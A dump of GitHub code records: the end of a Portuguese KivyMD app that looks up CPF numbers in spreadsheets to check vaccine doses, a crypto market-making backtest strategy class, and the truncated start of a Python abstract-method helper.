\"50\": \"E8F5E9\",\n \"100\": \"C8E6C9\",\n \"200\": \"A5D6A7\",\n \"300\": \"81C784\",\n \"400\": \"66BB6A\",\n \"500\": \"4CAF50\",\n \"600\": \"43A047\",\n \"700\": \"388E3C\",\n \"800\": \"2E7D32\",\n \"900\": \"1B5E20\",\n \"A100\": \"B9F6CA\",\n \"A200\": \"69F0AE\",\n \"A400\": \"00E676\",\n \"A700\": \"00C853\",\n },\n \"LightGreen\": {\n \"50\": \"F1F8E9\",\n \"100\": \"DCEDC8\",\n \"200\": \"C5E1A5\",\n \"300\": \"AED581\",\n \"400\": \"9CCC65\",\n \"500\": \"8BC34A\",\n \"600\": \"7CB342\",\n \"700\": \"689F38\",\n \"800\": \"558B2F\",\n \"900\": \"33691E\",\n \"A100\": \"CCFF90\",\n \"A200\": \"B2FF59\",\n \"A400\": \"76FF03\",\n \"A700\": \"64DD17\",\n },\n \"Lime\": {\n \"50\": \"F9FBE7\",\n \"100\": \"F0F4C3\",\n \"200\": \"E6EE9C\",\n \"300\": \"DCE775\",\n \"400\": \"D4E157\",\n \"500\": \"CDDC39\",\n \"600\": \"C0CA33\",\n \"700\": \"AFB42B\",\n \"800\": \"9E9D24\",\n \"900\": \"827717\",\n \"A100\": \"F4FF81\",\n \"A200\": \"EEFF41\",\n \"A400\": \"C6FF00\",\n \"A700\": \"AEEA00\",\n },\n \"Yellow\": {\n \"50\": \"FFFDE7\",\n \"100\": \"FFF9C4\",\n \"200\": \"FFF59D\",\n \"300\": \"FFF176\",\n \"400\": \"FFEE58\",\n \"500\": \"FFEB3B\",\n \"600\": \"FDD835\",\n \"700\": \"FBC02D\",\n \"800\": \"F9A825\",\n \"900\": \"F57F17\",\n \"A100\": \"FFFF8D\",\n \"A200\": \"FFFF00\",\n \"A400\": \"FFEA00\",\n \"A700\": \"FFD600\",\n },\n \"Amber\": {\n \"50\": \"FFF8E1\",\n \"100\": \"FFECB3\",\n \"200\": \"FFE082\",\n \"300\": \"FFD54F\",\n \"400\": \"FFCA28\",\n \"500\": \"FFC107\",\n \"600\": \"FFB300\",\n \"700\": \"FFA000\",\n \"800\": \"FF8F00\",\n \"900\": \"FF6F00\",\n \"A100\": \"FFE57F\",\n \"A200\": \"FFD740\",\n \"A400\": \"FFC400\",\n \"A700\": \"FFAB00\",\n },\n \"Orange\": {\n \"50\": \"FFF3E0\",\n \"100\": \"FFE0B2\",\n \"200\": \"FFCC80\",\n \"300\": \"FFB74D\",\n \"400\": \"FFA726\",\n \"500\": \"FF9800\",\n \"600\": \"FB8C00\",\n \"700\": \"F57C00\",\n \"800\": \"EF6C00\",\n \"900\": \"E65100\",\n \"A100\": \"FFD180\",\n \"A200\": \"FFAB40\",\n \"A400\": \"FF9100\",\n \"A700\": \"FF6D00\",\n },\n \"DeepOrange\": {\n \"50\": \"FBE9E7\",\n \"100\": \"FFCCBC\",\n \"200\": \"FFAB91\",\n \"300\": \"FF8A65\",\n \"400\": \"FF7043\",\n \"500\": \"FF5722\",\n \"600\": \"F4511E\",\n \"700\": \"E64A19\",\n \"800\": \"D84315\",\n \"900\": \"BF360C\",\n \"A100\": \"FF9E80\",\n \"A200\": \"FF6E40\",\n \"A400\": \"FF3D00\",\n \"A700\": \"DD2C00\",\n },\n \"Brown\": {\n \"50\": \"EFEBE9\",\n \"100\": \"D7CCC8\",\n \"200\": \"BCAAA4\",\n \"300\": \"A1887F\",\n \"400\": \"8D6E63\",\n \"500\": \"795548\",\n \"600\": \"6D4C41\",\n \"700\": \"5D4037\",\n \"800\": \"4E342E\",\n \"900\": \"3E2723\",\n \"A100\": \"000000\",\n \"A200\": \"000000\",\n \"A400\": \"000000\",\n \"A700\": \"000000\",\n },\n \"Gray\": {\n \"50\": \"FAFAFA\",\n \"100\": \"F5F5F5\",\n \"200\": \"EEEEEE\",\n \"300\": \"E0E0E0\",\n \"400\": \"BDBDBD\",\n \"500\": \"9E9E9E\",\n \"600\": \"757575\",\n \"700\": \"616161\",\n \"800\": \"424242\",\n \"900\": \"212121\",\n \"A100\": \"000000\",\n \"A200\": \"000000\",\n \"A400\": \"000000\",\n \"A700\": \"000000\",\n },\n \"BlueGray\": {\n \"50\": \"ECEFF1\",\n \"100\": \"CFD8DC\",\n \"200\": \"B0BEC5\",\n \"300\": \"90A4AE\",\n \"400\": \"78909C\",\n \"500\": \"607D8B\",\n \"600\": \"546E7A\",\n \"700\": \"455A64\",\n \"800\": \"37474F\",\n \"900\": \"263238\",\n \"A100\": \"000000\",\n \"A200\": \"000000\",\n \"A400\": \"000000\",\n \"A700\": \"000000\",\n },\n \"Light\": {\n \"StatusBar\": \"E0E0E0\",\n \"AppBar\": \"F5F5F5\",\n \"Background\": \"FAFAFA\",\n \"CardsDialogs\": \"FFFFFF\",\n \"FlatButtonDown\": \"cccccc\",\n },\n \"Dark\": {\n \"StatusBar\": \"000000\",\n \"AppBar\": \"1f1f1f\",\n \"Background\": \"121212\",\n \"CardsDialogs\": \"212121\",\n \"FlatButtonDown\": \"999999\",\n },\n}\n\n#layout do app\nBuilder.load_string(\n '''\n#:import images_path kivymd.images_path\n#:import Snackbar kivymd.uix.snackbar.Snackbar\n \n\n\n IconLeftWidget:\n icon: root.icon \n\n IconLeftWidget:\n icon: root.icon\n#\n#\n# \n# \n# --------------------------Layout Da caixa de confirmaçã--------------------------------------\n#\n#\n#\n\n orientation: \"vertical\"\n spacing: \"12dp\"\n size_hint_y: None\n height: \"360dp\"\n padding:\"12dp\"\n\n MDLabel:\n text: \"CPF: \"+app.namez\n font_style:\"Subtitle2\"\n MDTextField:\n mode: \"rectangle\"\n hint_text: \"\"\n text: app.dialogCpf\n line_color_normal:\"#398c36\"\n text_color_normal:\"#398c36\"\n disabled:True\n MDLabel:\n text: \"Ultima Vacina:\"\n font_style:\"Subtitle2\"\n MDTextField:\n mode: \"rectangle\"\n hint_text: \"\"\n text: app.dialogTurno\n line_color_normal:\"#398c36\"\n text_color_normal:\"#398c36\"\n disabled:True\n MDLabel:\n text: \"Doses Tomadas:\"\n font_style:\"Subtitle2\"\n MDTextField:\n mode: \"rectangle\"\n markup: True\n font_style: 'H1'\n hint_text: \"\"\n text: app.dialogVacinas\n line_color_normal:\"#398c36\"\n text_color_normal:\"#398c36\"\n disabled:True\n\n\n \n IconLeftWidget:\n icon: root.icon \n#\n#\n#\n#\n#\n#--------------------------Layout Principal--------------------------------------\n#\n#\n#\n\n MDBoxLayout:\n orientation: 'vertical'\n spacing: dp(0)\n padding: dp(0)\n MDBoxLayout:\n adaptive_height: True\n \n MDToolbar:\n title: \"\"\n\n MDBoxLayout:\n spacing: dp(0)\n padding: dp(60)\n orientation: 'vertical'\n\n Image:\n size_hint_y: None\n id: bg_image\n source: \"fpsicon.png\"\n pos_hint: {'center_x': .5, 'center_y': .5}\n width: 100\n allow_stretch: True\n \n MDLabel:\n text: \"Lista de Vacinados\"\n halign:\"center\"\n font_style:\"H6\"\n\n MDLabel:\n text: \"Insira as informações abaixo para realizar uma consulta\"\n halign:\"center\" \n\n MDTextField:\n id:campoCpf\n mode: \"rectangle\" \n width: \"2dp\"\n text_color_normal:app.theme_cls.primary_color\n hint_text_color_normal:app.theme_cls.accent_color\n current_hint_text_color:[0.23529411764705882, 0.2549019607843137, 0.25882352941176473, 1.0] #mudou borda e letra \n text_color:app.theme_cls.accent_color #mudou cor do texto selecionado pra azul\n hint_text: \"CPF:\" \n helper_text: \"\"\n helper_text_mode: \"on_focus\"\n on_focus: app.campo_Cpf_Selecionado()\n on_text_validate: app.campo_Cpf_Selecionado()\n\n MDLabel:\n id:textoNome\n theme_text_color: \"Custom\"\n text: \"Nome:\"\n font_style:\"Subtitle2\"\n text_color:\"#09101D\"\n \n MDTextField:\n id: campoNome\n active_line:False\n icon_right: \"card-account-details-outline\"\n mode: \"rectangle\"\n font_size:'15sp'\n #icon_right: \"card-account-details-outline\" \n disabled:True \n helper_text: \"você pode digitar se preferir\"\n helper_text_mode: \"on_focus\"\n text_color_normal:app.theme_cls.primary_color\n hint_text_color_normal:app.theme_cls.accent_color\n current_hint_text_color:[0.23529411764705882, 0.2549019607843137, 0.25882352941176473, 1.0] #mudou borda e letra \n text_color:app.theme_cls.accent_color #mudou cor do texto selecionado pra azul\n on_focus: app.campo_nome_Selecionado()\n \n MDLabel:\n id:textoNome\n theme_text_color: \"Custom\"\n text: \"Doses Tomadas:\"\n font_style:\"Subtitle2\"\n text_color:\"#09101D\"\n \n MDTextField:\n id: campoVacinas \n active_line:False\n icon_right: \"needle\"\n mode: \"rectangle\"\n font_size:'15sp'\n #icon_right: \"database-search\" \n disabled:True \n helper_text: \"você pode digitar se preferir\"\n helper_text_mode: \"on_focus\"\n \n text_color_normal:app.theme_cls.primary_color\n hint_text_color_normal:app.theme_cls.accent_color\n current_hint_text_color:[0.23529411764705882, 0.2549019607843137, 0.25882352941176473, 1.0] #mudou borda e letra \n text_color:app.theme_cls.accent_color #mudou cor do texto selecionado pra azul\n on_focus: app.campo_nome_Selecionado()\n \n MDLabel:\n id:textoAjudante\n text: \"Its Search Time!!\"\n font_style:\"Subtitle2\"\n theme_text_color: \"Custom\"\n text_color:\"#B95000\"\n \n RecycleView:\n id: rv\n key_viewclass: 'viewclass'\n key_size: 'height'\n RecycleBoxLayout:\n padding: dp(10)\n default_size: None, dp(48)\n default_size_hint: 1, None\n size_hint_y: None\n height: self.minimum_height\n orientation: 'vertical' \n\n MDFloatingActionButton:\n icon: \"database-search\"\n on_release: app.checarDados(campoCpf.text)\n md_bg_color: app.theme_cls.primary_color\n pos_hint: {'center_x': .5, 'center_y': .5}\n\n'''\n)\n\n#classe do turno abaixo:\nclass IconListItem(OneLineIconListItem):\n icon = StringProperty()\n\nclass Contentx(BoxLayout):\n pass\n\n\n#classe do dialog\nclass Item(OneLineAvatarListItem):\n icon = StringProperty()\n divider = None\n source = StringProperty()\n\nclass CustomSnackbar(Snackbar):\n text = StringProperty(None)\n icon = StringProperty(None)\n font_size = NumericProperty(\"15sp\")\n\n\nclass CustomDialog(MDDialog):\n title = StringProperty()\n icon = StringProperty()\n\nclass CapitalInput(MDTextField):\n def insert_text(self, substring, from_undo=False):\n s = substring.upper()\n return super(CapitalInput, self).insert_text(s, from_undo=from_undo)\n\nclass CustomOneLineIconListItem(OneLineIconListItem):\n icon = StringProperty()\n \n# Declare both screens\nclass MenuScreen(Screen):\n pass\n\nclass SettingsScreen(Screen):\n pass\nclass PreviousMDIcons(Screen):\n pass\n \n\n\nclass MainApp(MDApp):\n dialog = None\n dialog2=None\n dialog3=None\n namez=StringProperty(\"mat\")\n first_namez=StringProperty(\"mat\")\n dialogCpf=StringProperty(\"\")\n dialogTurno=StringProperty(\"\")\n dialogVacinas=StringProperty(\"\")\n dialogUltimaVacina=StringProperty(\"\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.screen = PreviousMDIcons() \n\n#\n#\n#-----------------checadores de dados------------------\n#\n#\n\n def campo_Cpf_Selecionado(self):\n if self.screen.ids.campoCpf.text==\"\":\n print(self.screen.ids.campoCpf.line_color_normal)\n print(self.screen.ids.campoCpf.text,\"hmm\")\n \n else:\n print(self.screen.ids.campoCpf.current_hint_text_color)\n print(self.screen.ids.campoCpf.text,\"hmm\")\n \n self.checarDados2(self.screen.ids.campoCpf.text) \n\n def campo_nome_Selecionado(self):\n self.screen.ids.campoVacinas.icon_right=\"chevron-up\"\n if self.screen.ids.campoVacinas.text==\"\":\n print(self.screen.ids.campoVacinas.current_hint_text_color)\n else: \n print(\"po\")\n\n def checar_cpf(self):\n if not self.screen.ids.campoCpf.text:\n if self.logado==True:\n self.screen.ids.textoAjudante.text=\"Você precisa preencher o cpf\"\n else:\n self.screen.ids.textoAjudante.text=\"Você precisa Logar em uma conta para continuar\"\n \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.campoCpf.line_color_normal=\"#B95000\"\n self.screen.ids.campoCpf.hint_text_color_normal=\"#09101D\"\n self.screen.ids.campoCpf.line_color_focus=\"#18a0fb\"\n self.screen.ids.campoCpf.hint_text_color_focus=\"#18a0fb\"\n\n else:\n if self.logado==True:\n self.screen.ids.textoAjudante.text=\"cpf foi corretamente selecionada\"\n else:\n self.screen.ids.textoAjudante.text=\"cpf foi corretamente selecionada\"\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n self.screen.ids.campoCpf.line_color_focus=\"#18a0fb\"\n self.screen.ids.campoCpf.line_color_normal=\"#287D3C\"\n self.screen.ids.campoCpf.hint_text_color_normal=\"#09101D\"\n self.screen.ids.campoCpf.hint_text_color_focus=\"#18a0fb\" \n\n def checarDados(self,cpf):\n self.dialogCpf=self.screen.ids.campoCpf.text\n self.dialogVacinas=self.screen.ids.campoVacinas.text\n self.dialogUltimaVacina=\"Rota \"+str(self.rota)\n self.checar_cpf()\n if self.logado==True:\n if self.screen.ids.campoCpf.text==\"\":\n self.matriculafinder=\"Preencha os campos obrigatórios para poder salvar! 3 vazios\"\n elif self.screen.ids.campoCpf.text in self.block:\n self.matriculafinder=\"este cpf já foi utilizada em um agendamento, peça a sua alteração na sala!\"\n self.screen.ids.textoAjudante.text=\"este cpf já foi registrada no sistema!\"\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n else:\n if self.logado==True:\n if self.cola1.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=1\n\n self.domat(self.screen.ids.campoCpf.text)\n\n self.show_confirmation_dialog()\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\" \n elif self.cola2.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=2\n\n self.domat(self.screen.ids.campoCpf.text)\n\n self.show_confirmation_dialog()\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\" \n else:\n self.matriculafinder=\"o cpf digitada não existe no sistema!\"\n self.screen.ids.textoAjudante.text=\"Nenhum Resultado foi encontrado!\"\n self.screen.ids.textoAjudante.text_color =\"#DA1414\" \n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n print(\"colab enchendo e number\")\n print(self.matriculafinder)\n else:\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.textoAjudante.text=\"Você precisa Logar em uma conta para continuar\" \n else:\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.textoAjudante.text=\"Você precisa Logar em uma conta para continuar\" \n def checarDados2(self,cpf):\n self.dialogCpf=self.screen.ids.campoCpf.text\n self.dialogVacinas=self.screen.ids.campoVacinas.text\n self.dialogUltimaVacina=\"Rota \"+str(self.rota)\n self.checar_cpf()\n \n if self.screen.ids.campoCpf.text==\"\":\n self.matriculafinder=\"Preencha os campos obrigatórios para poder salvar! 3 vazios\"\n elif self.screen.ids.campoCpf.text in self.block:\n self.matriculafinder=\"este cpf já foi utilizada em um agendamento, peça a sua alteração na sala!\"\n self.screen.ids.textoAjudante.text=\"este cpf já foi registrada no sistema!\"\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n else:\n\n if self.cola1.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=1\n\n self.domat(self.screen.ids.campoCpf.text)\n \n\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\"\n elif self.cola2.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=2\n\n self.domat(self.screen.ids.campoCpf.text)\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\" \n \n else:\n self.matriculafinder=\"o cpf digitada não existe no sistema!\"\n\n self.screen.ids.textoAjudante.text=\"Nenhum Estudante encontrado!\" \n self.screen.ids.textoAjudante.text_color =\"#DA1414\" \n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n self.screen.ids.campoVacinas.text=\"\"\n print(\"colab 1 :\")\n print(self.matriculafinder)\n#\n#\n#-----------------Salvar dados ------------------------\n#\n#\n def domat(self,cpf):\n if self.wsid==1:\n ws=wb.active\n else:\n ws=wd.active\n \n self.matriculafinder=\"Nenhuma cpf encontrada, verifique os dados e tente novamente!\"\n encouter=False\n print(\"valour de encouter é: \", str(encouter))\n \n log(\"debug: Lista de bloqueados - \"+str(self.block))\n\n for i in range(1, ws.max_row + 1):\n\n if str(cpf) == str(ws.cell(i,1).value):\n encouter=True\n if encouter == True:\n log(\"debug: uma matricula foi encontrada e uma caixa de dialogo foi acionada!\")\n log(\"debug: cpf encontrada e o valour de encouter é: \"+ str(encouter))\n rox=(ws.cell(i,1).value)\n self.namez=str(ws.cell(i,2).value)\n self.dialogTurno=str(ws.cell(i,5).value)\n self.dialogVacinas=str(ws.cell(i,7).value)\n self.dialogUltimaVacina=str(ws.cell(i,3).value)\n log(\"debug: Nome da aluna encontrada - \"+str(self.namez))\n self.screen.ids.campoNome.text=ws.cell(i,2).value\n self.screen.ids.campoVacinas.text=str(ws.cell(i,7).value)\n\n def doThis(self,cpf):\n #request_permissions([Permission.WRITE_EXTERNAL_STORAGE, Permission.READ_EXTERNAL_STORAGE])\n self.matriculafinder=\"Nenhuma cpf encontrada, verifique os dados e tente novamente!\"\n encouter=False\n log(\"debug: o valor de encouter é: \"+ str(encouter))\n\n for i in range(1, ws.max_row + 1):\n\n if str(cpf) == str(ws.cell(i,1).value):\n encouter=True\n log(\"debug: cpf encontrada e o valor de encouter é: \"+ str(encouter))\n now = datetime.now()\n dt=now.strftime(\"%d/%m/%Y %H:%M:%S\")\n if encouter == True:\n log(\"debug: cpf encontrada e o valour de encouter é: \"+ str(encouter))\n self.block.append(ws.cell(i,1).value)\n log(\"debug: Lista de bloqueados - \"+str(self.block))\n rox=(ws.cell(i,1).value,ws.cell(i,2).value,ws.cell(i,5).value,ws.cell(i,7).value,\"\",dt)\n \n name=str(ws.cell(i,1).value)\n self.first_name = name.rsplit(' ', 3)[0]\n self.matriculafinder= f'As informações foram salvas e uma copia do protocolo foi enviada para o estudante!'\n self.show(self.matriculafinder)\n \n rows = (\n (rox[0],rox[1], rox[2], rox[3],rox[4],rox[5],),\n\n )\n\n for row in rows:\n sheet.append(row)\n \n self.limpar()\n\n book.save(dirExcellDadosSalvos)\n \n elif str(cpf) != str(ws.cell(i,2).value):\n self.matriculafinder=\"Nenhuma cpf encontrada, verifique os dados e tente novamente!zzz\"\n if encouter == True:\n self.limpar()\n\n# \n#\n#-------------------------Snackbar--------------------------------\n#\n#\n def show(self,tt):\n self.snackbar = CustomSnackbar(\n text=tt,\n icon=\"information\",\n snackbar_x=\"10dp\",\n snackbar_y=\"10dp\",\n bg_color=\"#4caf50\",\n\n buttons=[MDFlatButton(text=\"[color=#FFFFFF]\"+\"OK\"+\"[/color]\", on_release= self.close,text_color=self.theme_cls.primary_color,),]\n \n )\n self.snackbar.size_hint_x = (\n Window.width - (self.snackbar.snackbar_x * 2)\n ) / Window.width\n self.snackbar.open()\n\n def limpar(self):\n self.screen.ids.campoVacinas.text=\"\"\n self.screen.ids.campoCpf.text=\"\"\n self.screen.ids.campoNome.text=\"\"\n self.screen.ids.textoAjudante.text=\"Insira um CPF para realizar uma pesquisa\"\n self.screen.ids.textoAjudante.text_color = \"#09101D\"\n self.screen.ids.textoNome.text_color = \"#09101D\"\n#\n# \n#----------------------dialogbox-----------------------------------------\n#\n#\n def close(self, *args):\n self.snackbar.dismiss(self)\n\n def show_confirmation_dialog(self):\n if not self.dialog:\n self.dialog = CustomDialog(\n title=\"Confira os detalhes da vacina\",\n icon=\"content-save\", \n type=\"custom\",\n content_cls=Contentx(),\n buttons=[\n MDRaisedButton(\n text=\"Editar informações\", md_bg_color=[.10, .10, .10, .10], text_color=[1,1,1,1],on_release= self.fecharDialogo\n ),\n MDRaisedButton(\n text=\"Confirmar e salvar\",md_bg_color=self.theme_cls.primary_color,text_color=[1,1,0,1], on_release= self.salvarDialogo\n ),\n ],\n )\n self.dialog.open()\n \n\n\n def salvarDialogo(self, *args):\n self.dialog.dismiss(force=True)\n log(\"debug: cpf que foi salva - \"+self.dialogCpf)\n cpf=self.dialogCpf\n self.dialogCpf=\"\"\n self.dialogTurno=\"\"\n self.dialogVacinas=\"\"\n self.dialogUltimaVacina=\"\"\n self.doThis(cpf)\n\n def fecharDialogo(self, *args):\n self.dialog.dismiss(force=True)\n##\n##-------------------Main configurations------------------------------------------------------\n##\n## \n def build(self):\n self.theme_cls.colors = colors\n self.theme_cls.primary_palette = \"Green\"\n self.theme_cls.accent_palette = \"Blue\"\n self.theme_cls.secondary_palette =\"Gray\"\n return self.screen\n \n def on_start(self):\n self.wsid=1\n self.screen.ids.campoCpf.line_color_focus=\"#18a0fb\"\n self.screen.ids.campoCpf.hint_text_color_focus=\"#18a0fb\"\n self.cola1=[]\n self.cola2=[]\n self.colab=[]\n self.logado=True\n self.block=[]\n #self.screen.set_list_md_icons()\n self.rota=\"\"\n self.first_name=\"\"\n self.cpfselect=False\n for i in range(1, ws.max_row + 1):\n self.cola1.append(ws.cell(i,1).value)\n for i in range(1, wz.max_row + 1):\n self.cola2.append(wz.cell(i,1).value)\n \nMainApp().run()\n\n","repo_name":"lukadsant/ListadeVacinados","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35815,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11810960900","text":"from datetime import timedelta, datetime, date\nimport pandas as pd\nimport numpy as np\nimport gzip\nimport shutil\nimport requests\nfrom collections import defaultdict\nimport time\nfrom Exchange import Exchange\nfrom Trade import Trade\nfrom Order import Order\nfrom heapq import heappush, heappop,heapify\nimport math\nimport os\n\n\nclass Strategy:\n ''' \n Class which interact wit the exchange to do the backtest \n and where you implement your own strategy \n '''\n def __init__(self, exchange, maker_fee = 2.5/1000, capital = 100, pct = 5/100):\n # self.current_time = start_time\n self.exchange = exchange\n self.prices = []\n #self.prices, self.prices = self.exchange.update_to_time(start_time)\n self.order_num = 0\n self.positions = 0.0\n self.realized_PNL = 0\n self.unrealized_PNL = 0\n self.MAKER_FEE = maker_fee\n self.capital = capital\n self.pct = pct\n # this is list because we allow dulplicates when record what is finished\n self.completed_order = []\n # these are sets because when place order each round we want unique orders\n self.orders_active = set([])\n self.orders_desired = set([])\n \n def add_order(self, direction, price, size ):\n ''' function that create a order object and add it to desired order list\n Inputs:\n direction: direction of order\n price: price of order\n size: size of order\n '''\n # ID auto generated as its position in order list\n ID = self.order_num\n self.order_num += 1\n \n order = Order(direction, size, price, ID)\n self.orders_desired.add(order)\n \n def place_orders(self):\n ''' function that place a set of orders to exchange'''\n ''' Uncomment print statements below to print out every order placed '''\n# print(' --------------------------\\n ')\n# print('Exchange time',self.exchange.current_time))\n# print('Current_order',[order.order_info() for order in self.orders_active],\n# '\\nDesired_order',[order.order_info() for order in self.orders_desired])\n\n # use set difference to find order to place and to cancel\n orders_to_place = self.orders_desired.difference(self.orders_active)\n orders_to_cancel = self.orders_active.difference(self.orders_desired)\n orders_to_keep = self.orders_active.intersection(self.orders_desired)\n \n# print('orders_to_place',[order.order_info() for order in orders_to_place],\n# '\\norders_to_cancel',[order.order_info() for order in orders_to_cancel],\n# '\\norders_to_keep',[order.order_info() for order in orders_to_keep])\n\n # reset activ order and desired order\n self.orders_active = self.orders_desired.copy()\n self.orders_desired = set([])\n \n # place and cancel orders\n self.exchange.place_orders(orders_to_place)\n self.exchange.cancel_orders(orders_to_cancel)\n \n# print('Orders_in_exchange',self.exchange.orders, self.exchange.queue)\n \n def update_prices(self,trade):\n ''' function that update exchange reported prices to record list\n Inputs:\n trade: a trade reported by exchange\n '''\n # update price to a list\n self.prices.append(trade.get_price())\n self.generate_signal()\n \n ### mean-reverting last tick, last tick up the next might go down...\n def generate_signal(self):\n ''' function that generate signal everytime a trade from exchange is updated\n it generate signal and place orders\n '''\n \n ''' \n IMPLEMENT YOUR STRATEGY HERE\n - Can add more recordings in fields, just need to add the code for update in \n update_prices(self,trade,coin)\n - Except MM strategy, also can use trained model to predict price\n\n SUBJECT TO CHANGE: \n place a sell order as last price * 1.01 and buy order as last price * 0.99,\n each time assume captial is constant and use pct*capital amount of money to place order\n '''\n # a simple MM strategy: look at MA 30 ticks vol and relative positions, \n # place orders when market shows no infomation about direction\n historical_prices = np.array(self.prices[-30:])\n \n if len(historical_prices) < 14:\n return\n\n # can make this a queue, can record in fields and update each update_prices\n MA_30ticks = np.mean(historical_prices)\n std_30ticks = np.std(historical_prices)\n \n max_div = (np.max(historical_prices) - np.min(historical_prices))/MA_30ticks\n \n lastest_price = historical_prices[-1]\n if std_30ticks != 0:\n z = abs(lastest_price - MA_30ticks)/std_30ticks # std of log return\n else:\n z = 0\n vol_30ticks = np.std(np.diff(np.log(historical_prices))) # very naive measure of current vol\n \n\n if all([z < 2,\n max_div < 0.02,\n vol_30ticks < 0.01]):\n min_tick_size = self.exchange.get_min_tick_size()\n \n for i in range(1,3):\n buy_price = lastest_price - min_tick_size*i\n sell_price = lastest_price + min_tick_size*i\n # place multiple order for market making\n self.add_order('Buy', buy_price, self.pct*self.capital/buy_price)\n self.add_order('Sell', sell_price, self.pct*self.capital/sell_price)\n \n # if there is no signal, it will still call place orders to cancel all orders \n self.place_orders()\n\n\n \n def mark_done(self,order,time):\n ''' function that mark a order as done, and record its time \n Inputs:\n order: order that is completed\n time: time when it is completed\n '''\n try:\n self.orders_active.remove(order)\n except:\n print(order.order_info())\n print([order.order_info() for order in self.orders_active])\n print([order.order_info() for order in self.orders_desired])\n raise Exception('order not exist in order order_list')\n # record completed order and update PNL\n dic = {'Buy':-1, 'Sell':1}\n sign = dic[order.get_type()]\n # add sign to maker fee, it should always be positive\n self.realized_PNL += sign*order.get_value()*(1+sign*self.MAKER_FEE)\n self.positions -= dic[order.get_type()]*order.get_size()\n self.completed_order.append((time,order))\n \n def calculate_unrealized_PNL(self):\n ''' \n function that compute all uncleared position with last trdae price in record\n we do not include maker fee here because it would be liquidated by the end of the backtest\n '''\n self.unrealized_PNL = self.positions*self.prices[-1]\n return self.unrealized_PNL\n \n def calculate_total_PNL(self):\n ''' function that compute all realized and unrealized PNL '''\n return self.calculate_unrealized_PNL() + self.get_realized_PNL()\n \n def get_realized_PNL(self):\n ''' function that compute the PNL realized through completed trades '''\n return self.realized_PNL\n \n def start_backtest(self):\n ''' function taht start backtest in self.exchange '''\n if self.exchange:\n self.exchange.add_subscriber(self)\n self.exchange.start_backtest()\n result_df = pd.DataFrame({'Realized_PNL':self.get_realized_PNL(),\n 'Total_PNL':self.calculate_total_PNL()},index = ['metrics'])\n try:\n display(result_df)\n except:\n print(result_df)\n else:\n raise Exception('Need to subscribe to exchange first')\n \n def get_positions(self):\n ''' functio that get the position in that strategy '''\n return self.positions\n ","repo_name":"klausxiang/Backtest_framework","sub_path":"Strategy.py","file_name":"Strategy.py","file_ext":"py","file_size_in_byte":8040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39974868163","text":"\"\"\"\n\n Trick to create abstract classes (raises error when instatiate)\n\n http://www.lychnis.net/index/programming/python-abstract-methods-3.lychnis\n\n Example: definition of an abstract class called \"MyAbstractClass\" with\n a virtual method called \"getSomething\"\n\n class MyAbstractClass(object):\n __metaclass__ = Metaclass\n getSomething = AbstractMethod('getSomething')\n\n \n\"\"\"\n\nclass AbstractMethod (object):\n def __init__(self, func):\n self._function = func\n \n def __get__(self, obj, type):\n return self.AbstractMethodHelper(self._function, type)\n\n class AbstractMethodHelper (object):\n def __init__(self, func, cls):\n self._function = func\n self._class = cls\n\n def __call__(self, *args, **kwargs):\n raise TypeError('Abstract method `' + self._class.__name__ \\\n + '.' + self._function + '\\' called')\n\nclass Metaclass (type):\n def 